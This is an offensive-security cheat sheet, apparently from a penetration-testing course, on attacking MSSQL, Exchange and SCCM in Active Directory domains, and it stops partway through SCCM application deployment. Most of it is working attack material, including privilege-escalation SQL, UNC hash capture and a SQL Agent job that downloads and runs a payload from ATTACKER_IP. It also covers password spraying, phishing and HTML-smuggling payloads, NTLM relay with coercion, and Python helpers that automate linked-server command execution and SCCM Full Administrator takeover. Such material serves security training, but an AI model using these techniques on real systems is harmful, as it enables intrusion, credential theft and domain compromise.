MSSQL, Exchange & SCCM -- Enterprise Service Exploitation

Enterprise services like MSSQL, Exchange, and SCCM are high-value targets in Active Directory environments. They often hold privileged credentials, allow lateral movement, and can lead to full domain compromise when misconfigured.

Target   | Attack Vector                             | Impact
---------|-------------------------------------------|-------------------------------------------
MSSQL    | Login impersonation (EXECUTE AS)          | sysadmin privilege escalation
MSSQL    | Trustworthy DB + db_owner                 | sysadmin privilege escalation
MSSQL    | UNC path injection (xp_dirtree)           | NetNTLMv2 hash capture
MSSQL    | xp_cmdshell / Agent Job / OLE             | RCE on the SQL server
MSSQL    | Linked servers                            | Lateral movement + credential extraction
Exchange | OWA password spray                        | Valid credentials
Exchange | Phishing (NTLM theft / HTA / smuggling)   | Hash capture / RCE
Exchange | CVE-2023-23397 / CVE-2023-35636           | NTLM hash theft
SCCM     | PXE boot media                            | NAA credentials (initial access)
SCCM     | Client Push exploitation                  | NTLM hash of push accounts
SCCM     | NTLM relay to site DB                     | Full SCCM admin
SCCM     | App/Script deployment                     | RCE as SYSTEM on clients

MSSQL Server

1. Connection and Authentication

Multiple authentication methods are available depending on access level and platform.

Linux -- impacket-mssqlclient

# SQL Server authentication
impacket-mssqlclient USER:PASS@TARGET_IP

# Windows (domain) authentication
impacket-mssqlclient DOMAIN/USER:PASS@TARGET_IP -windows-auth

# Kerberos authentication (target the FQDN, not the IP, so the MSSQLSvc SPN matches; needs a TGT in KRB5CCNAME)
impacket-mssqlclient DOMAIN/USER@sql01.domain.local -k -no-pass

# Pass-the-hash
impacket-mssqlclient DOMAIN/USER@TARGET_IP -hashes :NTHASH -windows-auth

Windows -- PowerUpSQL

Import-Module .\PowerUpSQL.psm1
Get-SQLQuery -Instance "TARGET,1433" -Username USER -Password PASS -Query "SELECT SYSTEM_USER"

Tip: Always try -windows-auth if SQL auth fails. Mixed-mode authentication is common but Windows auth may be the only option in domain-joined environments.


2. Database Enumeration

Impacket MSSQLClient Built-in Commands

Use these commands directly in the impacket MSSQL shell for quick enumeration.

SQL> enum_logins          # Enumerate logins and roles
SQL> enum_db              # Enumerate databases
SQL> enum_users           # Enumerate users in current DB
SQL> enum_owner           # Enumerate DB owners
SQL> enum_impersonate     # Check impersonation permissions
SQL> enum_links           # Enumerate linked servers

T-SQL Queries

For more granular enumeration, use raw SQL queries.

-- Enumerate logins with roles
SELECT r.name, r.type_desc, r.is_disabled, sl.sysadmin, sl.securityadmin
FROM master.sys.server_principals r
LEFT JOIN master.sys.syslogins sl ON sl.sid = r.sid
WHERE r.type IN ('S','E','X','U','G');

-- Enumerate databases with owner and trustworthy flag
SELECT a.name AS 'database', b.name AS 'owner', is_trustworthy_on
FROM sys.databases a
JOIN sys.server_principals b ON a.owner_sid = b.sid;

-- Enumerate database users
USE webshop;
EXECUTE sp_helpuser;

-- Check who can be impersonated: for IMPERSONATE on a login, major_id is the
-- login being impersonated and grantee_principal_id is the login allowed to do it
SELECT imp.name AS impersonated_login, gr.name AS grantee
FROM sys.server_permissions sp
JOIN sys.server_principals imp ON sp.major_id = imp.principal_id
JOIN sys.server_principals gr  ON sp.grantee_principal_id = gr.principal_id
WHERE sp.permission_name = 'IMPERSONATE' AND sp.class_desc = 'SERVER_PRINCIPAL';

PowerUpSQL -- Automated Discovery

# Discover MSSQL instances in the domain via SPNs
Get-SQLInstanceDomain -Verbose

# Get server information
Get-SQLServerInfo -Username USER -Password PASS -Instance TARGET

# Run automated security audit
Invoke-SQLAudit -Username USER -Password PASS -Instance TARGET

# Full dump to CSV
Invoke-SQLDumpInfo -Username USER -Password PASS -Instance TARGET

3. Privilege Escalation

Login Impersonation

When a login has IMPERSONATE permission on another login (commonly sa), you can escalate to sysadmin.

-- Check who can be impersonated (major_id = impersonated login, grantee = who may do it)
SELECT imp.name AS impersonated_login, gr.name AS grantee
FROM sys.server_permissions sp
JOIN sys.server_principals imp ON sp.major_id = imp.principal_id
JOIN sys.server_principals gr  ON sp.grantee_principal_id = gr.principal_id
WHERE sp.permission_name = 'IMPERSONATE' AND sp.class_desc = 'SERVER_PRINCIPAL';

-- Impersonate the sa login
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;  -- confirm: should return 'sa'

-- Revert when done
REVERT;

Via impacket:

SQL> exec_as_login sa
SQL> SELECT SYSTEM_USER;
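EXECUTE AS LOGIN nests: once you are running as a login, that login's own IMPERSONATE grants apply, so a chain such as ws_dev -> ws_user -> sa still escalates when nothing grants you IMPERSONATE on sa directly. The helper below is an added example, not code from impacket or PowerUpSQL. It takes the (grantee, impersonated login) rows from the query above plus the set of sysadmin logins (from enum_logins), finds the shortest chain from your login to a sysadmin with a breadth-first search, and emits the nested EXECUTE AS statements to run. The login names and grant rows in the sample are constructed.

```python
from collections import deque

# (grantee, impersonated_login) rows as returned by the IMPERSONATE query above.
# Constructed sample data for this example, not output from a real instance.
SAMPLE_GRANTS = [
    ("ws_dev", "ws_user"),
    ("ws_user", "sa"),
    ("reporting", "ws_dev"),
]
# Logins holding the sysadmin fixed server role (see enum_logins / the
# sys.server_principals query above). Constructed sample.
SAMPLE_SYSADMINS = {"sa"}


def build_graph(grants):
    """Map each grantee (lower-cased) to the set of logins it may impersonate."""
    graph = {}
    for grantee, target in grants:
        graph.setdefault(grantee.lower(), set()).add(target.lower())
    return graph


def find_chain(current_login, grants, sysadmins):
    """Shortest list of logins to impersonate, in order, to reach a sysadmin.

    Returns [] if current_login already is sysadmin and None if no chain exists.
    Breadth-first search over the IMPERSONATE graph: every hop is a login on
    which the login reached by the previous hop holds IMPERSONATE, which is
    exactly the permission nested EXECUTE AS LOGIN checks at each level.
    """
    graph = build_graph(grants)
    admins = {s.lower() for s in sysadmins}
    start = current_login.lower()
    if start in admins:
        return []
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        login, path = queue.popleft()
        for nxt in sorted(graph.get(login, ())):
            if nxt in seen:
                continue
            new_path = path + [nxt]
            if nxt in admins:
                return new_path
            seen.add(nxt)
            queue.append((nxt, new_path))
    return None


def chain_to_tsql(chain):
    """Render the chain as nested EXECUTE AS LOGIN statements, a check that the
    final context is sysadmin, and one REVERT per hop to unwind afterwards."""
    lines = ["EXECUTE AS LOGIN = '%s';" % login.replace("'", "''") for login in chain]
    lines.append("SELECT SYSTEM_USER AS running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;")
    lines.extend(["REVERT;"] * len(chain))
    return "\n".join(lines)


if __name__ == "__main__":
    chain = find_chain("ws_dev", SAMPLE_GRANTS, SAMPLE_SYSADMINS)
    print("chain:", chain)          # ['ws_user', 'sa']
    if chain:
        print(chain_to_tsql(chain))
```

Keep sa in the sysadmin set even when enum_logins shows it disabled: a disabled login cannot connect, but it can still be impersonated with EXECUTE AS, and the impersonated context gets its server role membership.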

Trustworthy Database + db_owner

This technique requires three conditions: the database is marked TRUSTWORTHY, your login (or one you can impersonate) maps to a member of db_owner in that database, and the database is owned by a sysadmin login (typically sa). A procedure created WITH EXECUTE AS OWNER runs as dbo, and because the database is trustworthy that dbo context is mapped to the owning sysadmin login at server level. In the example your login is ws_dev and ws_user is a db_owner of webshop that you may impersonate; if ws_dev is itself db_owner, skip the EXECUTE AS / REVERT pair.

-- Step 1: Find trustworthy databases and their owners
SELECT name, SUSER_SNAME(owner_sid) AS owner, is_trustworthy_on
FROM sys.databases
WHERE is_trustworthy_on = 1;

-- Step 2: Switch to the trustworthy DB and impersonate a db_owner user
USE webshop;
EXECUTE AS LOGIN = 'ws_user';
SELECT IS_ROLEMEMBER('db_owner');  -- must return 1

-- Step 3: Create a stored procedure that grants sysadmin to your own login
CREATE PROCEDURE sp_privesc
WITH EXECUTE AS OWNER
AS
    EXEC sp_addsrvrolemember 'ws_dev', 'sysadmin'  -- or: ALTER SERVER ROLE sysadmin ADD MEMBER ws_dev
GO
EXECUTE sp_privesc;
DROP PROCEDURE sp_privesc;

-- Step 4: Verify escalation
REVERT;
SELECT IS_SRVROLEMEMBER('sysadmin');  -- should return 1; reconnect if it still shows 0

Automated with PowerUpSQL:

Invoke-SQLEscalatePriv -Username USER -Password PASS -Instance TARGET -Verbose

4. UNC Path Injection (Hash Capture)

Force the MSSQL server to authenticate to your listener, capturing the service account's NetNTLMv2 hash. No sysadmin required for some methods.

Start a listener:

sudo responder -I tun0 -v

Trigger from the MSSQL session:

EXEC xp_dirtree '\\ATTACKER_IP\share';
-- or
EXEC xp_subdirs '\\ATTACKER_IP\share';
-- or
EXEC xp_fileexist '\\ATTACKER_IP\share';

Via impacket:

SQL> xp_dirtree \\ATTACKER_IP\share

Crack the captured hash:

hashcat -m 5600 hash.txt ~/tools/wordlists/rockyou.txt

Tip: If the MSSQL service runs as a domain user account, the captured NetNTLMv2 hash can be cracked offline or relayed (where signing is not enforced on the target) for lateral movement. Virtual accounts such as NT SERVICE\MSSQLSERVER authenticate over the network as the computer account (HOST$), whose hash is not practically crackable; in that case the more useful asset is the SeImpersonatePrivilege the service account holds on the host once you have command execution (section 7).


5. Command Execution

By default every command execution method below requires sysadmin (xp_cmdshell can be delegated to non-sysadmins through a proxy account, but that is uncommon). If you do not have sysadmin yet, escalate first using impersonation or the trustworthy DB technique.

xp_cmdshell (Most Common)

The most straightforward method. Requires enabling the feature first.

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Execute commands
EXEC xp_cmdshell 'whoami';

-- Disable after use (cleanup)
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

Via impacket:

SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
SQL> disable_xp_cmdshell

SQL Agent Job (Blind Execution)

Useful when xp_cmdshell is monitored. Requires the SQL Server Agent service to be running.

USE msdb;
EXEC sp_add_job @job_name = N'Malicious Job';
EXEC sp_add_jobstep @job_name = N'Malicious Job',
    @step_name = N'Execute',
    @subsystem = N'PowerShell',
    @command = N'(New-Object Net.WebClient).DownloadString("http://ATTACKER_IP/payload")|IEX;',
    @retry_attempts = 5, @retry_interval = 5;
EXEC sp_add_jobserver @job_name = N'Malicious Job';
EXEC sp_start_job @job_name = N'Malicious Job';

Via impacket (auto-cleanup):

SQL> sp_start_job cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"

Tip: Agent Jobs execute blindly -- there is no direct output. Write results to a file or exfiltrate via HTTP.

OLE Automation

Alternative when xp_cmdshell and Agent Jobs are unavailable. Also blind execution.

-- Enable OLE Automation
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'ole automation procedures', 1; RECONFIGURE;

-- Execute command (wscript.shell runs it as the SQL Server service account)
DECLARE @objShell INT;
EXEC sp_OACreate 'wscript.shell', @objShell OUTPUT;
EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';
EXEC sp_OADestroy @objShell;

-- Cleanup
EXEC sp_configure 'ole automation procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

PowerUpSQL Wrappers

# xp_cmdshell
Invoke-SQLOSCmd -Username USER -Password PASS -Instance TARGET -Command "whoami"

# Agent Job
Invoke-SQLOSCmdAgentJob -Username USER -Password PASS -Instance TARGET -SubSystem CmdExec -Command "whoami"

# OLE Automation
Invoke-SQLOSCmdOle -Username USER -Password PASS -Instance TARGET -Command "whoami"

6. Linked Servers

Linked servers allow a SQL Server to execute queries on remote database servers. They often use stored credentials and can be chained for lateral movement.

Discovery

-- T-SQL
EXEC sp_linkedservers;

# impacket
SQL> enum_links

Executing Queries on Linked Servers

-- Using OPENQUERY (read data; runs as the login the link maps you to)
SELECT * FROM OPENQUERY(SQL02, 'SELECT name FROM sys.databases');

-- Check if the link's login has sysadmin on the linked server
SELECT * FROM OPENQUERY(SQL02, 'SELECT IS_SRVROLEMEMBER(''sysadmin'')');

-- Using EXECUTE AT (full RCE capability; requires the link's "RPC Out" option to be enabled)
-- Quotes inside the string are doubled, not replaced with double quotes, so the statement
-- parses regardless of the remote session's QUOTED_IDENTIFIER setting
EXECUTE ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE; EXEC xp_cmdshell ''whoami'';') AT SQL02;

Via impacket (handles link hopping and quote escaping automatically):

SQL> use_link SQL02
SQL >SQL02> xp_cmdshell whoami
SQL >SQL02> use_link localhost  # return to the original server (use_link .. goes back one hop)

PowerUpSQL -- Link Crawling

Recursively maps all linked servers in the chain.

# Map all links recursively
Get-SQLServerLinkCrawl -Username USER -Password PASS -Instance TARGET

# Execute a query across all links
$Out = Get-SQLServerLinkCrawl -Username USER -Password PASS -Instance TARGET -Query "SELECT SYSTEM_USER"
foreach ($Server in $Out) { $Server.CustomQuery | ForEach-Object { Write-Host($_.Item(0)) } }
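Every hop through EXECUTE ... AT or OPENQUERY wraps the inner statement in another string literal, so each level doubles every single quote inside it; past two hops that is where hand-written chains break. The helper below is an added example (not impacket's use_link or PowerUpSQL's crawler) that builds correctly escaped multi-hop statements from a list of link names; the link names SQL02 and SQL03 in the sample are constructed.

```python
def bracket(name):
    """Quote a linked-server name as a T-SQL delimited identifier ([..], ] doubled)."""
    return "[" + name.replace("]", "]]") + "]"


def escape_literal(sql):
    """Double single quotes so sql survives being embedded in another '...' literal."""
    return sql.replace("'", "''")


def execute_at(path, statement):
    """Wrap statement in one EXECUTE (...) AT layer per hop, outermost hop first.

    path lists the linked-server names to traverse from the server you are
    connected to, e.g. ["SQL02", "SQL03"] runs statement on SQL03 through the
    link SQL01 -> SQL02 -> SQL03. Each layer doubles every quote inside it.
    EXECUTE AT needs the link's "RPC Out" option enabled on each hop.
    """
    sql = statement
    for hop in reversed(path):
        sql = "EXECUTE ('%s') AT %s" % (escape_literal(sql), bracket(hop))
    return sql


def openquery(path, query):
    """Same nesting for read-only SELECTs via OPENQUERY (no RPC Out needed, but
    only a single result set and no side-effecting statements)."""
    sql = query
    for hop in reversed(path):
        sql = "SELECT * FROM OPENQUERY(%s, '%s')" % (bracket(hop), escape_literal(sql))
    return sql


def xp_cmdshell_via(path, command):
    """Enable xp_cmdshell on the final hop and run command there; the login the
    last link maps to must be sysadmin on that hop for sp_configure to succeed."""
    stmt = ("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
            "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; "
            "EXEC xp_cmdshell '%s';" % escape_literal(command))
    return execute_at(path, stmt)


if __name__ == "__main__":
    hops = ["SQL02", "SQL03"]   # constructed link names for the example
    print(openquery(hops, "SELECT IS_SRVROLEMEMBER('sysadmin')"))
    print(execute_at(hops, "SELECT IS_SRVROLEMEMBER('sysadmin')"))
    print(xp_cmdshell_via(hops, "whoami"))
```

Check each hop with the openquery() form of IS_SRVROLEMEMBER('sysadmin') first: OPENQUERY works without RPC Out, and if the mapped login is not sysadmin on that hop the xp_cmdshell_via() statement fails at sp_configure rather than at xp_cmdshell.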

Extracting Linked Server Credentials (Post-Exploitation)

Linked server passwords are stored encrypted with the Service Master Key (SMK). Reading the tables below requires sysadmin and a Dedicated Admin Connection (DAC, e.g. sqlcmd -S ADMIN:TARGET -E); decrypting them requires the SMK, which is protected with DPAPI plus an entropy value kept in the registry, so you also need local admin on the SQL server.

-- Extract linked server credential hashes (DAC only)
SELECT sysservers.srvname, syslnklgns.name, syslnklgns.pwdhash
FROM master.sys.syslnklgns
INNER JOIN master.sys.sysservers ON syslnklgns.srvid = sysservers.srvid
WHERE LEN(pwdhash) > 0;

-- Extract the encrypted Service Master Key (needed for decryption)
SELECT * FROM sys.key_encryptions;

Automated extraction (NetSPI module, run locally on the SQL server as an administrator):

Import-Module .\Get-MSSQLLinkPasswords.psm1
Get-MSSQLLinkPasswords

7. Host Privilege Escalation (SeImpersonatePrivilege)

SQL Server setup grants its service accounts SeImpersonatePrivilege, so a shell obtained through xp_cmdshell can normally be escalated to SYSTEM with a Potato-family tool.

Service Account            | Default Privilege / Notes
---------------------------|----------------------------------------------------------------------
NT SERVICE\MSSQLSERVER     | SeImpersonatePrivilege; authenticates to the network as the machine account
NT SERVICE\SQLSERVERAGENT  | SeImpersonatePrivilege
Domain user (custom)       | SeImpersonatePrivilege plus a domain identity whose hash is capturable via UNC injection

# After getting a shell via xp_cmdshell, use a Potato attack
# (GodPotato, PrintSpoofer, JuicyPotatoNG, etc.)
SQL> xp_cmdshell C:\Windows\Tasks\GodPotato.exe -cmd whoami

Tip: If the service runs as a domain user instead of the default service account, focus on capturing that hash via UNC path injection rather than Potato attacks.


Microsoft Exchange

8. Version Detection and Enumeration

Detecting Exchange Version

Use the eDiscovery endpoint to identify the exact Exchange build number.

# Extract version from eDiscovery endpoint
curl -k https://TARGET/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application \
  | xmllint --format - | grep version

Cross-reference the build number with the Microsoft Exchange build numbers page.

NTLM Endpoint Enumeration

# Scan for endpoints exposing NTLM authentication
python3 ntlmscan.py --host https://TARGET_IP

# Nmap NTLM info extraction
sudo nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 TARGET_IP

Tip: NTLM endpoints reveal internal hostnames, domain names, and sometimes the DNS forest name -- useful for mapping the environment.


9. Username Enumeration

Generating Username Wordlists

# Generate possible usernames from a list of names
./username-anarchy --input-file names.txt

Extracting the Global Address List (GAL)

The GAL contains all email-enabled objects in the organization.

From Linux:

python3 emailextract.py -i exch01.domain.local -u user@domain.local -p 'PASS'

From Windows using MailSniper:

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/MailSniper.ps1')
Get-GlobalAddressList -ExchHostname exch01.domain.local -Username user -Password 'PASS' -OutFile gal.txt

10. Password Spraying

Use valid usernames from the GAL dump to spray against OWA/ECP.

From Linux:

./ruler-linux64 --domain domain.local --insecure brute \
  --users users.txt --passwords passwords.txt -a 4

From Windows:

# Spray against OWA
Invoke-PasswordSprayOWA -ExchHostname exch01.domain.local \
  -UserList usernames.txt -Password "Password2024!" -OutFile creds.txt

# Always check lockout policy first
(Get-DomainPolicy)."SystemAccess"
# LockoutBadCount = 0 means no lockout

Tip: Always check the lockout threshold before spraying. A value of 0 means no lockout, but be cautious -- some organizations use third-party lockout solutions that do not appear in the default policy.


11. Phishing Techniques

NTLM Hash Theft via Email

Generate documents that force NTLM authentication when opened by the victim.

# Generate hash theft payloads (supports 21 file types)
python3 ntlm_theft.py -g htm -s ATTACKER_IP -f payload

# Start responder to capture hashes
sudo responder -I tun0

Send the .htm file as an email attachment. When the user opens it, their NetNTLMv2 hash is captured.

Credential Prompt via Responder HTTP

# Start responder with HTTP listener
sudo responder -I tun0

# Send email containing a hyperlink to http://ATTACKER_IP/
# When the user clicks, they get a credential prompt

HTA Server (Metasploit)

HTA files execute directly in Windows without download warnings in older environments.

msfconsole -x "use exploit/windows/misc/hta_server; \
  set LHOST ATTACKER_IP; set LPORT 8443; \
  set SRVHOST ATTACKER_IP; run -j"
# Send the generated link via email

HTML Smuggling

Embeds a payload inside HTML that auto-downloads when opened in a browser. Bypasses email gateway scanning.

<script>
// Decode the embedded base64 payload into raw bytes inside the browser,
// so the executable never crosses the mail gateway as an attachment
function base64ToArrayBuffer(base64) {
  var binary = window.atob(base64);
  var bytes = new Uint8Array(binary.length);
  for (var i = 0; i < binary.length; i++) { bytes[i] = binary.charCodeAt(i); }
  return bytes.buffer;
}
var file = '<BASE64_ENCODED_EXE>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'policies.doc';   // filename the victim sees in the download bar
a.click();
</script>

CVE-2023-23397 (Outlook NTLM Theft via Reminder)

A critical Outlook vulnerability (patched March 2023) that triggers NTLM authentication without user interaction. An appointment whose reminder sound path (the PidLidReminderFileParameter MAPI property) points to a UNC path makes the Outlook client authenticate to that host when the reminder fires; the victim only needs to receive the item, no click required.

Appointment -> Reminder -> Sound -> \\ATTACKER_IP\academy.wav

Tip: CVE-2023-23397 requires the Outlook desktop client for Windows (not OWA). It triggers when the reminder fires, so set the reminder time so that it is already due when the client processes the item. The related CVE-2023-35636 (listed in the table above) leaks the NTLM hash through a crafted .ICS calendar file and does require the user to open it.


SCCM (System Center Configuration Manager)

12. Architecture Overview

Understanding SCCM architecture is critical for identifying attack paths.

Component               | Role
------------------------|----------------------------------------------------------------------------
Primary Server          | Central management server for the SCCM site
MSSQL Database          | Stores all configuration and inventory data (may be on a separate server)
SMS Provider            | Interface between the SCCM service and DB (WMI + AdminService API)
Distribution Point (DP) | Distributes applications, scripts, and packages to clients
Management Point (MP)   | Orchestrates client configuration and communication
Client Push Account     | Service account with local admin on all managed endpoints

Deployment methods: Client Push (default, least secure), Software Update, Group Policy, Manual, Logon Script, Package.

Tip: When the MSSQL database or SMS Provider is on a separate server from the Primary Server, NTLM relay attacks become possible. This is the most common SCCM takeover path.


13. PXE Boot Initial Access

When PXE boot is enabled, boot media can be intercepted to extract Network Access Account (NAA) credentials.

Prerequisites: PXE server exposed (UDP ports 67, 68, 69, 4011).

Extracting PXE Boot Media

# Enumerate PXE boot media
python .\pxethief.py 2 DP_IP

# Download boot variables via TFTP
tftp -i DP_IP GET "\SMSTemp\TIMESTAMP.{GUID}.boot.var" "boot.var"

# Extract hash for offline cracking
python .\pxethief.py 5 '.\boot.var'
# Output format: $sccm$aes128$...

Cracking the Media Password

hashcat -m 19850 --force -a 0 hash ~/tools/wordlists/rockyou.txt

Decrypting NAA Credentials

# Decrypt media and extract NAA credentials
python .\pxethief.py 3 '.\boot.var' "CrackedPassword"
# Output: Network Access Account username/password
# Output: Task Sequence credentials (OSDJoinAccount)

14. Credential Harvesting

DPAPI Secrets via sccmhunter (Requires Admin on SCCM Server)

Extracts NAA credentials, Task Sequence variables, and Collection Variables from DPAPI-protected storage.

# Via WMI repository
python3 sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target SCCM_IP -wmi

# Via OBJECTS.DATA on disk (includes deleted secrets)
python3 sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target SCCM_IP -disk

# Both methods
python3 sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target SCCM_IP -both

HTTP Policy Request (No Admin Required)

Only requires a computer account in the domain. Recovers NAA credentials by requesting machine policies from the Management Point.

# Create a computer account (if MAQ > 0)
addcomputer.py -computer-name 'PWNED$' -computer-pass 'Pass123' \
  -dc-ip DC_IP 'DOMAIN/USER:PASS'

# Recover NAA via policy request
python3 sccmhunter.py http -u USER -p PASS -d DOMAIN -dc-ip DC_IP \
  -cn 'PWNED$' -cp 'Pass123'

15. Client Push Exploitation

When Client Push Installation is enabled, the SCCM server uses a high-privilege service account to connect to endpoints. By forcing a push to a machine you control, you capture that account's NTLM hash.

Prerequisites: automatic client push enabled, NTLM fallback still allowed ("Allow connection fallback to NTLM" set, KB15599094 not applied), and client communication not restricted to HTTPS only.

# Terminal 1: Start Inveigh to capture NTLM hashes
.\Inveigh.exe

# Terminal 2: Force client push to your machine
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP

Two authentications arrive: the site server's machine account and each configured client push account, which is typically local admin on every managed endpoint. Both can be cracked or relayed to other targets.


16. Site Takeover via NTLM Relay

Relay to MSSQL Site Database

The site server's computer account is a sysadmin on the site database. When the MSSQL database is on a separate server from the Primary Server, coerce the site server to authenticate to you and relay that machine account to the database; control of the site database is full SCCM admin.

# Step 1: Setup NTLM relay targeting the MSSQL server
ntlmrelayx.py -t "mssql://SQL_IP" -smb2support -socks

# Step 2: Coerce authentication from the SCCM server
python3 PetitPotam.py -u USER -p 'PASS' -d DOMAIN ATTACKER_IP SCCM_IP

# Step 3: Connect via SOCKS proxy to MSSQL
proxychains4 -q impacket-mssqlclient 'DOMAIN/SCCM01$'@SQL_IP -windows-auth -no-pass

Once connected, add yourself as a Full Administrator in the SCCM database:

USE CM_HTB;   -- the site database is CM_<SITECODE>

-- Insert admin record (replace 0xSID_BINARY with your user's SID in binary form;
-- on a domain-joined instance SELECT SUSER_SID('DOMAIN\USER') returns exactly that value)
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite)
VALUES (0xSID_BINARY,'DOMAIN\USER',0,0,'','','','','SITECODE');

-- Look up the AdminID assigned to the new record
SELECT AdminID, LogonName FROM RBAC_Admins WHERE LogonName = 'DOMAIN\USER';

-- Grant Full Administrator (SMS0001R) on the "All" security scope, All Systems and All Users and User Groups
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (NEW_ID,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (NEW_ID,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (NEW_ID,'SMS0001R','SMS00004','1');
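The INSERT above needs the SID as a binary literal, and the AdminID is only known after the first row exists. The helper below is an added example (not part of sccmhunter, SharpSCCM or the page's original SQL): it converts an SDDL SID string to the binary layout stored in RBAC_Admins.AdminSID (revision, sub-authority count, 6-byte big-endian authority, little-endian sub-authorities) and emits the whole takeover batch with the AdminID looked up inside the batch. Site code HTB, the account DOMAIN\USER and the domain SID in the sample are constructed.

```python
# Role / scope identifiers used by the INSERTs above.
FULL_ADMIN_ROLE = "SMS0001R"      # Full Administrator role
PERMISSIONS = [                    # (ScopeID, ScopeTypeID)
    ("SMS00ALL", "29"),            # the "All" security scope
    ("SMS00001", "1"),             # All Systems collection
    ("SMS00004", "1"),             # All Users and User Groups collection
]


def sid_to_bytes(sid):
    """Convert an SDDL SID string (S-1-5-21-...-RID) to its binary form.

    Layout: revision (1 byte), sub-authority count (1 byte), identifier
    authority (6 bytes, big-endian), then each sub-authority as a
    little-endian uint32. This is the form stored in RBAC_Admins.AdminSID.
    """
    parts = sid.strip().upper().split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not an SDDL SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or len(subs) > 15:
        raise ValueError("unsupported SID: %r" % sid)
    return (bytes([revision, len(subs)])
            + authority.to_bytes(6, "big")
            + b"".join(s.to_bytes(4, "little") for s in subs))


def sid_to_tsql_hex(sid):
    """0x-prefixed hex literal that can be pasted into a varbinary column."""
    return "0x" + sid_to_bytes(sid).hex().upper()


def takeover_sql(site_code, logon_name, sid):
    """Build the batch that makes logon_name a Full Administrator of site site_code.

    The site database is CM_<site code>. The AdminID is selected inside the
    batch after the first INSERT, so it does not have to be known in advance.
    """
    logon = logon_name.replace("'", "''")
    code = site_code.upper()
    lines = [
        "USE CM_%s;" % code,
        "INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,"
        "CreatedDate,ModifiedBy,ModifiedDate,SourceSite)",
        "VALUES (%s,'%s',0,0,'','','','','%s');" % (sid_to_tsql_hex(sid), logon, code),
        "DECLARE @AdminID INT = (SELECT TOP 1 AdminID FROM RBAC_Admins "
        "WHERE LogonName = '%s' ORDER BY AdminID DESC);" % logon,
    ]
    for scope_id, scope_type in PERMISSIONS:
        lines.append("INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) "
                     "VALUES (@AdminID,'%s','%s','%s');" % (FULL_ADMIN_ROLE, scope_id, scope_type))
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed site code, account and SID for the example.
    print(takeover_sql("HTB", "DOMAIN\\USER", "S-1-5-21-1004336348-1177238915-682003330-1105"))
```

Get the SID with Get-DomainUser USER | Select objectsid (PowerView) or lookupsid.py and paste the batch into the relayed impacket-mssqlclient session; the result should match what SELECT SUSER_SID('DOMAIN\USER') returns on a domain-joined instance.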

Relay to SMS Provider (AdminService API)

When the SMS Provider is on a separate server, relay to the AdminService API to add yourself as admin directly.

# Setup relay targeting AdminService (requires impacket fork with SCCM relay support)
ntlmrelayx.py -t https://SMS_IP/AdminService/wmi/SMS_Admin -smb2support \
  --adminservice --logonname "DOMAIN\USER" --displayname "DOMAIN\USER" \
  --objectsid S-1-5-21-...-RID

# Coerce authentication
python3 PetitPotam.py -u USER -p 'PASS' -d DOMAIN ATTACKER_IP SCCM_IP
# Success: "Server returned code 201, attack successful"

Relay from Passive Site Server

# Relay the passive server's machine account to the Primary Server
ntlmrelayx.py -t SCCM_PRIMARY_IP -smb2support -socks

# Coerce the passive server
python3 PetitPotam.py -u USER -p 'PASS' -d DOMAIN ATTACKER_IP PASSIVE_SCCM_IP

# Dump secrets via SOCKS
proxychains4 -q secretsdump.py 'DOMAIN/SCCM02$'@SCCM_PRIMARY_IP -no-pass

17. Post-Exploitation (Application and Script Deployment)

Once you have SCCM Full Administrator access, deploy applications or scripts to execute as SYSTEM on any managed client.

Enumeration via sccmhunter

python3 sccmhunter.py admin -u USER -p PASS -ip SMS_PROVIDER_IP

# Inside the admin shell:
show_admins                    # List all SCCM admins
get_device HOSTNAME            # Get device info (ResourceId)
interact RESOURCE_ID           # Interact with a specific device
administrators                 # List local admins on the device
ls                             # List files on the device

Application Deployment (SharpSCCM)

# 1. Create application pointing to your payload
.\SharpSCCM.exe new application -s -n APP_NAME -p \\ATTACKER_IP\share\payload.exe -sms SMS_IP

# 2. Create a device collection
.\SharpSCCM.exe new collection -n "COLLECTION" -t device -sms SMS_IP

# 3. Add target device to the collection
